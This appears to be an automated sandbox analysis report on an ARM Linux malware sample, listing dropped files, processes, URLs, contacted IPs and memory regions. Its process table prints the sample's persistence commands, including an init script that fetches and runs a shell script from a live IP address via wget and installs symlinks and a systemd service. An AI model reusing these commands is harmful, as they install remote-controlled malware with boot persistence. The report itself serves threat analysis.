Files
|
File Path
|
Type
|
Category
|
Malicious
|
|
|---|---|---|---|---|
|
arm5.nn-20241014-0317.elf
|
ELF 32-bit LSB executable, ARM, version 1 (ARM), statically linked, stripped
|
initial sample
|
 |
|
|
/etc/init.d/arm5.nn-20241014-0317.elf
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/init.d/mybinary
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/etc/profile
|
ASCII text
|
dropped
|
|
|
|
/etc/rc.local
|
POSIX shell script, ASCII text executable
|
dropped
|
|
|
|
/boot/bootcmd
|
ASCII text
|
dropped
|
||
|
/etc/inittab
|
ASCII text
|
dropped
|
||
|
/etc/motd
|
ASCII text
|
dropped
|
||
|
/etc/systemd/system/custom.service
|
ASCII text
|
dropped
|
||
|
/memfd:snapd-env-generator (deleted)
|
ASCII text
|
dropped
|
||
|
/tmp/qemu-open.W4tgrz (deleted)
|
ASCII text, with no line terminators
|
dropped
|
Processes
|
Path
|
Cmdline
|
Malicious
|
|
|---|---|---|---|
|
/tmp/arm5.nn-20241014-0317.elf
|
/tmp/arm5.nn-20241014-0317.elf
|
||
|
/tmp/arm5.nn-20241014-0317.elf
|
-
|
||
|
/tmp/arm5.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "systemctl enable custom.service >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/systemctl
|
systemctl enable custom.service
|
||
|
/tmp/arm5.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/mybinary >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/mybinary
|
||
|
/tmp/arm5.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/mybinary /etc/rcS.d/S99mybinary
|
||
|
/tmp/arm5.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "echo \"#!/bin/sh\n# /etc/init.d/arm5.nn-20241014-0317.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting arm5.nn-20241014-0317.elf'\n
/tmp/arm5.nn-20241014-0317.elf &\n wget http://87.120.84.247/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh
&\n ;;\n stop)\n echo 'Stopping arm5.nn-20241014-0317.elf'\n killall arm5.nn-20241014-0317.elf\n ;;\n restart)\n
$0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start|stop|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" >
/etc/init.d/arm5.nn-20241014-0317.elf"
|
||
|
/tmp/arm5.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "chmod +x /etc/init.d/arm5.nn-20241014-0317.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/chmod
|
chmod +x /etc/init.d/arm5.nn-20241014-0317.elf
|
||
|
/tmp/arm5.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/mkdir
|
mkdir -p /etc/rc.d
|
||
|
/tmp/arm5.nn-20241014-0317.elf
|
-
|
||
|
/bin/sh
|
sh -c "ln -s /etc/init.d/arm5.nn-20241014-0317.elf /etc/rc.d/S99arm5.nn-20241014-0317.elf >/dev/null 2>&1"
|
||
|
/bin/sh
|
-
|
||
|
/usr/bin/ln
|
ln -s /etc/init.d/arm5.nn-20241014-0317.elf /etc/rc.d/S99arm5.nn-20241014-0317.elf
|
||
|
/tmp/arm5.nn-20241014-0317.elf
|
-
|
||
|
/tmp/arm5.nn-20241014-0317.elf
|
-
|
||
|
/tmp/arm5.nn-20241014-0317.elf
|
-
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/libexec/gnome-session-binary
|
-
|
||
|
/bin/sh
|
/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
|
||
|
/usr/libexec/gsd-housekeeping
|
/usr/libexec/gsd-housekeeping
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/systemd/systemd
|
-
|
||
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
/usr/lib/systemd/system-environment-generators/snapd-env-generator
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
||
|
/usr/lib/udisks2/udisksd
|
-
|
||
|
/usr/sbin/dumpe2fs
|
dumpe2fs -h /dev/dm-0
|
There are 38 hidden processes, click here to show them.
URLs
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
http://87.120.84.247/
|
unknown
|
||
|
http://87.120.84.247/curl.sh
|
unknown
|
||
|
http://87.120.84.247/lol.sh
|
unknown
|
Domains
|
Name
|
IP
|
Malicious
|
|
|---|---|---|---|
|
daisy.ubuntu.com
|
162.213.35.24
|
IPs
|
IP
|
Domain
|
Country
|
Malicious
|
|
|---|---|---|---|---|
|
221.60.20.196
|
unknown
|
Japan
|
||
|
211.8.148.71
|
unknown
|
Japan
|
||
|
146.14.30.68
|
unknown
|
United States
|
||
|
79.54.134.170
|
unknown
|
Italy
|
||
|
153.179.233.184
|
unknown
|
Japan
|
||
|
184.181.194.119
|
unknown
|
United States
|
||
|
104.117.28.226
|
unknown
|
United States
|
||
|
109.180.172.4
|
unknown
|
United Kingdom
|
||
|
172.114.128.239
|
unknown
|
United States
|
||
|
152.49.93.222
|
unknown
|
United States
|
||
|
185.215.136.201
|
unknown
|
France
|
||
|
160.139.193.20
|
unknown
|
United States
|
||
|
25.163.198.145
|
unknown
|
United Kingdom
|
||
|
62.50.159.149
|
unknown
|
United Kingdom
|
||
|
184.20.60.89
|
unknown
|
United States
|
||
|
105.56.79.247
|
unknown
|
Kenya
|
||
|
20.80.41.205
|
unknown
|
United States
|
||
|
91.39.107.151
|
unknown
|
Germany
|
||
|
130.2.218.107
|
unknown
|
United States
|
||
|
12.117.146.23
|
unknown
|
United States
|
||
|
214.69.176.247
|
unknown
|
United States
|
||
|
58.182.62.111
|
unknown
|
Singapore
|
||
|
165.62.214.208
|
unknown
|
Zambia
|
||
|
101.62.189.77
|
unknown
|
Italy
|
||
|
27.53.153.46
|
unknown
|
Taiwan; Republic of China (ROC)
|
||
|
164.247.70.110
|
unknown
|
United States
|
||
|
17.187.40.27
|
unknown
|
United States
|
||
|
212.0.249.48
|
unknown
|
Netherlands
|
||
|
180.106.95.149
|
unknown
|
China
|
||
|
120.26.147.79
|
unknown
|
China
|
||
|
17.83.38.234
|
unknown
|
United States
|
||
|
180.62.162.9
|
unknown
|
Japan
|
||
|
202.75.145.78
|
unknown
|
Malaysia
|
||
|
66.253.60.172
|
unknown
|
United States
|
||
|
207.115.138.123
|
unknown
|
United States
|
||
|
192.200.217.42
|
unknown
|
United States
|
||
|
214.51.30.227
|
unknown
|
United States
|
||
|
167.182.73.51
|
unknown
|
United States
|
||
|
69.166.101.215
|
unknown
|
United States
|
||
|
154.5.29.216
|
unknown
|
Canada
|
||
|
7.94.150.159
|
unknown
|
United States
|
||
|
201.247.13.238
|
unknown
|
El Salvador
|
||
|
90.2.253.30
|
unknown
|
France
|
||
|
184.54.244.240
|
unknown
|
United States
|
||
|
84.199.115.4
|
unknown
|
Belgium
|
||
|
211.12.177.185
|
unknown
|
Japan
|
||
|
126.83.234.218
|
unknown
|
Japan
|
||
|
168.205.227.186
|
unknown
|
Brazil
|
||
|
41.145.39.248
|
unknown
|
South Africa
|
||
|
167.148.96.233
|
unknown
|
United States
|
||
|
14.244.2.32
|
unknown
|
Viet Nam
|
||
|
59.39.110.167
|
unknown
|
China
|
||
|
180.148.242.209
|
unknown
|
China
|
||
|
75.25.159.139
|
unknown
|
United States
|
||
|
145.118.198.68
|
unknown
|
Netherlands
|
||
|
45.46.175.217
|
unknown
|
United States
|
||
|
216.147.68.17
|
unknown
|
United States
|
||
|
71.119.13.35
|
unknown
|
United States
|
||
|
210.24.249.55
|
unknown
|
Japan
|
||
|
195.79.214.230
|
unknown
|
European Union
|
||
|
58.192.228.25
|
unknown
|
China
|
||
|
155.175.159.28
|
unknown
|
United States
|
||
|
195.230.62.141
|
unknown
|
Austria
|
||
|
101.144.121.102
|
unknown
|
China
|
||
|
160.40.210.75
|
unknown
|
Greece
|
||
|
105.34.237.104
|
unknown
|
Egypt
|
||
|
5.9.137.133
|
unknown
|
Germany
|
||
|
116.138.106.80
|
unknown
|
China
|
||
|
163.214.94.11
|
unknown
|
Japan
|
||
|
79.37.66.62
|
unknown
|
Italy
|
||
|
39.251.49.222
|
unknown
|
Indonesia
|
||
|
6.95.118.213
|
unknown
|
United States
|
||
|
201.95.217.28
|
unknown
|
Brazil
|
||
|
28.94.175.145
|
unknown
|
United States
|
||
|
119.92.168.214
|
unknown
|
Philippines
|
||
|
86.160.98.189
|
unknown
|
United Kingdom
|
||
|
143.208.41.138
|
unknown
|
Brazil
|
||
|
118.179.36.67
|
unknown
|
Bangladesh
|
||
|
155.193.234.161
|
unknown
|
Reserved
|
||
|
21.191.218.108
|
unknown
|
United States
|
||
|
63.174.22.88
|
unknown
|
United States
|
||
|
222.219.138.147
|
unknown
|
China
|
||
|
139.69.177.176
|
unknown
|
United States
|
||
|
89.108.208.170
|
unknown
|
Poland
|
||
|
159.242.47.13
|
unknown
|
United States
|
||
|
184.2.98.175
|
unknown
|
United States
|
||
|
116.18.216.40
|
unknown
|
China
|
||
|
51.17.46.145
|
unknown
|
United Kingdom
|
||
|
193.143.1.59
|
unknown
|
unknown
|
||
|
15.101.132.150
|
unknown
|
United States
|
||
|
29.140.145.202
|
unknown
|
United States
|
||
|
23.19.162.97
|
unknown
|
United States
|
||
|
185.205.111.252
|
unknown
|
Switzerland
|
||
|
1.13.112.124
|
unknown
|
China
|
||
|
68.167.148.175
|
unknown
|
United States
|
||
|
72.40.94.8
|
unknown
|
United States
|
||
|
108.255.133.38
|
unknown
|
United States
|
||
|
214.137.210.219
|
unknown
|
United States
|
||
|
208.64.132.243
|
unknown
|
United States
|
||
|
7.168.161.49
|
unknown
|
United States
|
There are 90 hidden IPs, click here to show them.
Memdumps
|
Base Address
|
Regiontype
|
Protect
|
Malicious
|
|
|---|---|---|---|---|
|
7fc250031000
|
page execute read
|
|
||
|
7fc250031000
|
page execute read
|
|
||
|
564e47eca000
|
page read and write
|
|||
|
564e47c79000
|
page execute read
|
|||
|
564e4a0a1000
|
page read and write
|
|||
|
564e47ed3000
|
page read and write
|
|||
|
7fc250039000
|
page read and write
|
|||
|
7fc34ffff000
|
page read and write
|
|||
|
7fc354bd7000
|
page read and write
|
|||
|
7fc3560b9000
|
page read and write
|
|||
|
7fc3557d3000
|
page read and write
|
|||
|
7fc355daf000
|
page read and write
|
|||
|
7fc355daf000
|
page read and write
|
|||
|
7fc355f90000
|
page read and write
|
|||
|
564e49ed1000
|
page execute and read and write
|
|||
|
7fc34ffff000
|
page read and write
|
|||
|
7fc3560b9000
|
page read and write
|
|||
|
564e47ed3000
|
page read and write
|
|||
|
564e49ed1000
|
page execute and read and write
|
|||
|
564e49ee8000
|
page read and write
|
|||
|
7fc355bcd000
|
page read and write
|
|||
|
564e4a0a1000
|
page read and write
|
|||
|
7fc355a61000
|
page read and write
|
|||
|
7fc3553df000
|
page read and write
|
|||
|
7ffdaa7d8000
|
page execute read
|
|||
|
7fc3560dd000
|
page read and write
|
|||
|
7fc3560dd000
|
page read and write
|
|||
|
7ffdaa6df000
|
page read and write
|
|||
|
7fc356122000
|
page read and write
|
|||
|
7fc25003d000
|
page read and write
|
|||
|
7fc355a3e000
|
page read and write
|
|||
|
564e47eca000
|
page read and write
|
|||
|
7fc250039000
|
page read and write
|
|||
|
7fc355471000
|
page read and write
|
|||
|
564e47c79000
|
page execute read
|
|||
|
7fc355bcd000
|
page read and write
|
|||
|
7ffdaa6df000
|
page read and write
|
|||
|
7fc355a3e000
|
page read and write
|
|||
|
7fc355471000
|
page read and write
|
|||
|
7fc350021000
|
page read and write
|
|||
|
7fc356122000
|
page read and write
|
|||
|
7fc350021000
|
page read and write
|
|||
|
7fc3557d3000
|
page read and write
|
|||
|
7fc3553df000
|
page read and write
|
|||
|
7ffdaa7d8000
|
page execute read
|
|||
|
7fc25003d000
|
page read and write
|
|||
|
7fc355a61000
|
page read and write
|
|||
|
7fc355f90000
|
page read and write
|
|||
|
7fc250043000
|
page read and write
|
|||
|
564e49ee8000
|
page read and write
|
|||
|
7fc354bd7000
|
page read and write
|
There are 41 hidden memdumps, click here to show them.